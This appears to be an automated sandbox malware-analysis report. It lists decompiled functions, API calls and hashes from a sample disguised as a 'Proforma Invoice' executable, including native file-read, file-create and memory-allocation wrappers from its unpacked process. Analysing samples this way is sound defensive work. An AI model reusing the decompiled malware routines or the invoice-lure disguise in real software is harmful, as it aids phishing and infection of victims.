Opcode Fuzzy Hash: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
Instruction Fuzzy Hash: BCF08972A44245FFD710EBB19E49EAF7668DB00348F14443BB142F51C2D6FC5982976D

Uniqueness

Uniqueness Score: -1.00%

Function 0040361A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f45c;
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f45c =  *0x41f45c & 0x00000000;
				return _t3;
			}

0x0040361b
0x00403623
0x0040362a
0x0040362d
0x0040362d
0x0040362f
0x00403634
0x0040363b
0x00403641
0x00403645
0x00403646
0x0040364e

APIs

FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,00000000,73BCF560,004035F1,00000000,0040342D,00000000), ref: 00403634
GlobalFree.KERNEL32 ref: 0040363B

Strings

"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" , xrefs: 0040362C

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: "C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe"
API String ID: 1100898210-137519302
Opcode ID: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
Instruction ID: 07f203a12dc211ea1540440f4769086933c1ddaa55d0411da1bb29b7fd771b51
Opcode Fuzzy Hash: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
Instruction Fuzzy Hash: 8FE08C32804420ABC6216F55EC0579A7768AB48B22F028536E900BB3A083743C464BDC

Uniqueness

Uniqueness Score: -1.00%

Function 004056A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056A0(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004056a1
0x004056ab
0x004056ad
0x004056b4
0x004056bc
0x00000000
0x00000000
0x00000000
0x004056bc
0x004056be
0x004056c3

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe,C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe,80000000,00000003), ref: 004056A6
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe,C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe,80000000,00000003), ref: 004056B4

Strings

C:\Users\user\Desktop, xrefs: 004056A0

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 6658d1b0ab05e5211e75f0b74aef41c49d7b43cb9628f8e009f88ad9fa15a52a
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: C5D0A772409DB02EF30352108C04B8F7A98CF17300F0948A2E440E21D0C27C5C818FFD

Uniqueness

Uniqueness Score: -1.00%

Function 6F7310E0, Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F7310E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x6f73405c = _a8;
				 *0x6f734060 = _a16;
				 *0x6f734064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6f734038, E6F731556, _t52);
				_t43 =  *0x6f73405c +  *0x6f73405c * 4 << 2;
				_t17 = E6F73123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E6F731266(E6F7312AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E6F7312D1( *_t55 - 0x30, E6F73123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x6f734030;
								 *0x6f734030 = _t31;
								E6F731508(_t31 + 4,  *0x6f734064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x6f734030;
							if( *0x6f734030 != 0) {
								E6F731508( *0x6f734064, _t34 + 4, _t43);
								_t37 =  *0x6f734030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x6f734030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x6f7310e7
0x6f7310ef
0x6f731103
0x6f73110b
0x6f731116
0x6f731119
0x6f731121
0x6f731124
0x6f731126
0x6f7311c4
0x6f7311d0
0x6f73112c
0x6f73112d
0x6f73112d
0x6f731130
0x6f731131
0x6f731134
0x6f731203
0x6f731206
0x6f73119e
0x6f7311a4
0x6f7311ac
0x6f7311b1
0x6f7311b4
0x00000000
0x6f7311b4
0x6f731209
0x6f73120a
0x6f731186
0x6f73118c
0x6f731194
0x00000000
0x6f731194
0x6f731152
0x6f731153
0x6f73115b
0x6f731168
0x6f731170
0x6f731179
0x6f73117e
0x6f73117e
0x00000000
0x6f731153
0x6f73113a
0x6f7311d1
0x6f7311d1
0x6f7311d8
0x6f7311e5
0x6f7311ea
0x6f7311ef
0x6f7311f5
0x6f7311fb
0x6f7311fb
0x00000000
0x6f7311d8
0x6f731140
0x6f731143
0x00000000
0x00000000
0x6f731149
0x6f73114c
0x6f73119b
0x00000000
0x6f73119b
0x6f73114f
0x6f731150
0x6f731183
0x00000000
0x6f731183
0x00000000
0x6f7311ba
0x6f7311ba
0x00000000
0x6f7311c3

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6F73115B
GlobalFree.KERNEL32 ref: 6F7311B4
GlobalFree.KERNEL32 ref: 6F7311C7
GlobalFree.KERNEL32 ref: 6F7311F5

Memory Dump Source

Source File: 00000000.00000002.658919807.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true

Associated: 00000000.00000002.658908947.000000006F730000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658929430.000000006F733000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658938298.000000006F735000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f730000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: d7d93b3e4a017f119a460a5c60f4dcd117360ce219d62051c3eafaed9e8a9f91
Instruction ID: 651c70aeaf78a47589029349b43bdc22185198010a2c60892fd57051f839ae30
Opcode Fuzzy Hash: d7d93b3e4a017f119a460a5c60f4dcd117360ce219d62051c3eafaed9e8a9f91
Instruction Fuzzy Hash: A731E4B3E04624BFDB208F68EB48AA57FF9FB46261B044177E844C6152D7B6D810CB51

Uniqueness

Uniqueness Score: -1.00%

Function 004057B2, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057B2(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x004057be
0x004057c0
0x004057e8
0x004057cd
0x004057d2
0x004057dd
0x00000000
0x004057fa
0x004057e6
0x004057e6
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057D2
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Proforma Invoice and Bank swift-REG.PI-0086547654.exe PID: 7028 Parent PID: 6952 Proforma Invoice and Bank swift-REG.PI-0086547654.exeCOMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	2.8%
Signature Coverage:	5.9%
Total number of Nodes:	580
Total number of Limit Nodes:	70

Executed Functions

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b3c
0x00409b3f
0x00409b44
0x00409b49
0x00409b53
0x00409b58
0x00409b5b
0x00409b5d
0x00409b65
0x00409b6a
0x00409b6a
0x00409b71
0x00409b79
0x00409b7c
0x00409b7e
0x00409b92
0x00000000
0x00409b94
0x00409b9a
0x00409b4e
0x00409b4e
0x00409b4e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181BC, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E004181BC(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				0x5575c336();
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181bc
0x004181c3
0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b42beeebcb93c8c03a6cb9def736e9d972206908d1428750cdbc711cfac7c09e
Instruction ID: f0a779ebae8fee41b4deff0fa93ddf394fa56b85c640302032d43e9405f63f81
Opcode Fuzzy Hash: b42beeebcb93c8c03a6cb9def736e9d972206908d1428750cdbc711cfac7c09e
Instruction Fuzzy Hash: 75F0B6B2201108AFCB08CF88DC85EEB37ADAF8C754F158248FA0D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041839B, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041839B(intOrPtr __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t23;

				 *0x8b55606b = __eax;
				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0xca0
				E00418DC0(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}

0x0041839d
0x004183a3
0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 0e4d5856592366917989f1aa1ff67522a7307a9f9b0a75a8d1dcbfef82523251
Instruction ID: 47126f67824ec2e12559f21743c4985258fd7cf86f1b65fdea1652602c17182f
Opcode Fuzzy Hash: 0e4d5856592366917989f1aa1ff67522a7307a9f9b0a75a8d1dcbfef82523251
Instruction Fuzzy Hash: 1BF01CB6200218AFDB14DF99DC80EE777ADEF98754F11855DFA1997241C630E911CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004182EB, Relevance: 1.5, APIs: 1, Instructions: 19
nativeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004182EB(void* __ebx, signed int __ecx, intOrPtr _a8, void* _a12) {
				long _t8;
				void* _t13;
				signed int _t17;
				signed int _t18;

				_pop(ss);
				_t18 = _t17 << __ecx;
				 *0x8bec8b55 =  *0x8bec8b55 + __ebx;
				_push(_t18);
				_t5 = _a8;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t13, _a8, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a12); // executed
				return _t8;
			}

0x004182eb
0x004182ec
0x004182ee
0x004182f0
0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: efbbdeeee5228d91602948ad2d42712c4e4ca017dd9bc3e17e494e5d0110e4be
Instruction ID: 6f4eb02e6ae1224d9afe4a88d23c53f01807042d6ada970f8ce4b35750f4294c
Opcode Fuzzy Hash: efbbdeeee5228d91602948ad2d42712c4e4ca017dd9bc3e17e494e5d0110e4be
Instruction Fuzzy Hash: 47D02B6D50D3C04FC711EBF468D60C27F40DE511187140ECFE49907143D638D1099392

Uniqueness

Uniqueness Score: -1.00%

Function 00B298F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B298FA

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6a50ef6abf9a8e7e49d09b6db7a99b505a8175d12c3c427af76822f3a3272717
Instruction ID: a12824a0fecb23e0463bea3084b0b5442ba8e4e3605ac2b4fae20d9227e98a78
Opcode Fuzzy Hash: 6a50ef6abf9a8e7e49d09b6db7a99b505a8175d12c3c427af76822f3a3272717
Instruction Fuzzy Hash: A990026261100502D201715D5404616104AD7D0382FE1D076A1014555ECA6589B2F171

Uniqueness

Uniqueness Score: -1.00%

Function 00B29860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B2986A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0dcda02637bd550bba4a983991b3e53ff37414ff25319d189ae4341fac535d1
Instruction ID: 85248daf9d69bc00665ac43befab3d3d423b9cb7cc1f25c74368f22cc74fd522
Opcode Fuzzy Hash: e0dcda02637bd550bba4a983991b3e53ff37414ff25319d189ae4341fac535d1
Instruction Fuzzy Hash: 0E90027221100413D211615D55047071049D7D0382FE1D466A0414558D96968972F161

Uniqueness

Uniqueness Score: -1.00%

Function 00B29840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B2984A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 39cd2fdc9211503a437203fcc2691d83f64ad06951d48b22d2f7b0609a6c654d
